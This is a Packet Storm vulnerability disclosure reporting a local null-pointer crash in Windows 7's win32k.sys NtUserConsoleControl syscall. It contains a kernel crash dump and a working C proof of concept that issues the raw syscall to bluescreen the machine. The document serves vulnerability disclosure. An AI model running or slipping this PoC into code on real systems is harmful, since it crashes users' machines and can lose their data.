Microsoft Windows Kernel (win32k.sys) suffers from a local denial of service null pointer vulnerability in NtUserConsoleControl.
86a086e5f1f20c3922d862e53a6241005dcd8473c973a2b52f82a0788801f936Hello,
It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:
- NtUserControlConsole(1,0,8).
- NtUserControlConsole(4,0,8).
- NtUserControlConsole(6,0,12).
- NtUserControlConsole(2,0,12).
- NtUserControlConsole(3,0,20).
- NtUserControlConsole(5,0,8).
Different crashes are reproduced for each case. For the second case the
crash is showed below:
*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]TRAP_FRAME: 8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nccs=0008
ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
*0xc:93310641 8b0e mov ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULTBUGCHECK_STR: 0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL: 0LAST_CONTROL_TRANSFER: from 9330fc27 to
93310641STACK_TEXT: 8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*
*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*
*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND: kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*
*c93310641 8b0e mov ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME: win32k!xxxSetConsoleCaretInfo+*
*cFOLLOWUP_NAME: MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP: 5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*
*xxxSetConsoleCaretInfo+cBUCKET_ID: 0x8E_win32k!*
*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*
*PoC code:*
*#include <Windows.h>*
*extern "C"*
*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*
* __asm{mov eax, ApiNumber};*
* __asm{lea edx, ApiNumber + 4};*
* __asm{int 0x2e};*
*}*
*int _tmain(int argc, _TCHAR* argv[])*
*{*
* int st = 0;*
* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*
*LoadLibrary(L"user32.dll");*
* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*
* return 0;*
*}*
The vulnerability has only been tested in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.
Best regards,
Victor Portal
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed